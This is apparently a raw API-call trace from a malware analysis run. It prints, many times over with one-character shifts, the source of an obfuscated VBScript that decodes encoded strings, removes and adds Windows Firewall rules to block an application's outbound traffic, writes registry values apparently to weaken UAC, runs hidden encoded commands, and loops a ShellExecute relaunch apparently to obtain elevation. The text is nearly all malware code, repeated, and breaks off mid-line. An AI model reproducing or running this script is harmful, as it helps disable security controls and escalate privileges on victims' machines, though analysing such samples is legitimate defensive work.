bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.322] wcsncmp (_String1="Const ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.322] wcsncmp (_String1="onst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.322] wcsncmp (_String1="nst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.322] wcsncmp (_String1="st ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.323] wcsncmp (_String1="t ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 